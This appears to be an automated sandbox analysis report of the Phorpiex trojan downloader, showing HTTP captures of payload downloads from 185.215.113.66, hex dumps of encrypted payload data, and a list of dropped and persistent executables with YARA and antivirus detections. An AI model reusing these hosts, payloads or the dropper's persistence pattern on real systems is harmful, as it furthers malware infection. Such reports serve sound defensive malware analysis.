                                                                              May 8, 2024 15:25:57.380295992 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:57 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              59192.168.2.849807185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:26:10.156857967 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:26:10.497107029 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:26:10 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:26:10.497241974 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:26:10.497333050 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:26:10.497349024 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:26:10.497562885 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:26:10.497608900 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:26:10.498331070 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:26:10.498344898 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              60192.168.2.849809185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:26:12.870759010 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:26:13.211987972 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:26:13 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:26:13.212258101 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:26:13.212305069 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:26:13.212373972 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:26:13.212554932 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:26:13.212584019 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:26:13.212657928 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:26:13.212678909 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:15:22:09
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.2135.18096.85.exe"
                                                                              Imagebase:0x400000
                                                                              File size:100'864 bytes
                                                                              MD5 hash:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000000.1395571963.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000002.1426443501.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000003.1416145697.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:15:22:11
                                                                              Start date:08/05/2024
                                                                              Path:C:\Windows\sysbrapsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\sysbrapsvc.exe
                                                                              Imagebase:0x400000
                                                                              File size:100'864 bytes
                                                                              MD5 hash:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000000.1416106928.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000003.1665949097.0000000004781000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysbrapsvc.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 79%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:4
                                                                              Start time:15:22:23
                                                                              Start date:08/05/2024
                                                                              Path:C:\Windows\sysbrapsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\sysbrapsvc.exe"
                                                                              Imagebase:0x400000
                                                                              File size:100'864 bytes
                                                                              MD5 hash:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000002.1565210090.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000004.00000000.1544428131.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:15:22:25
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\3193211493.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\3193211493.exe
                                                                              Imagebase:0x400000
                                                                              File size:100'864 bytes
                                                                              MD5 hash:0A547347B0B9AF0290B263DFA8D71EBE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000002.1579593026.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000000.1558944525.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\3193211493.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 79%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:7
                                                                              Start time:15:22:38
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Imagebase:0xdb0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:D085F41FE497A63DC2A4882B485A2CAF
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 96%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:8
                                                                              Start time:15:22:50
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\2303012543.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\2303012543.exe
                                                                              Imagebase:0xb50000
                                                                              File size:8'704 bytes
                                                                              MD5 hash:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 30%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:15:22:52
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\winploravr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\winploravr.exe"
                                                                              Imagebase:0x2a0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:D085F41FE497A63DC2A4882B485A2CAF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 96%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:15:22:56
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\2006625995.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\2006625995.exe
                                                                              Imagebase:0xd70000
                                                                              File size:22'016 bytes
                                                                              MD5 hash:802C60DB52BD6C4DB699A74F63A00D8D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:15:22:59
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\2711236308.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\2711236308.exe
                                                                              Imagebase:0x390000
                                                                              File size:8'704 bytes
                                                                              MD5 hash:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 30%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:15:23:00
                                                                              Start date:08/05/2024
                                                                              Path:C:\Windows\winploravr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\winploravr.exe"
                                                                              Imagebase:0xf0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:D085F41FE497A63DC2A4882B485A2CAF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 96%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:15:23:04
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\330125677.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\330125677.exe
                                                                              Imagebase:0x6f0000
                                                                              File size:8'704 bytes
                                                                              MD5 hash:11D2F27FB4F0C424AB696573E79DB18C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 62%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:15:23:07
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\1245832676.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\1245832676.exe
                                                                              Imagebase:0xae0000
                                                                              File size:8'704 bytes
                                                                              MD5 hash:9B8A3FB66B93C24C52E9C68633B00F37
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 30%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:17
                                                                              Start time:15:23:08
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\winploravr.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\winploravr.exe"
                                                                              Imagebase:0x2a0000
                                                                              File size:14'848 bytes
                                                                              MD5 hash:D085F41FE497A63DC2A4882B485A2CAF
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:18
                                                                              Start time:15:23:12
                                                                              Start date:08/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\300129380.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\300129380.exe
                                                                              Imagebase:0x3f0000
                                                                              File size:11'264 bytes
                                                                              MD5 hash:CAFD277C4132F5D0F202E7EA07A27D5C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 38%, ReversingLabs
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

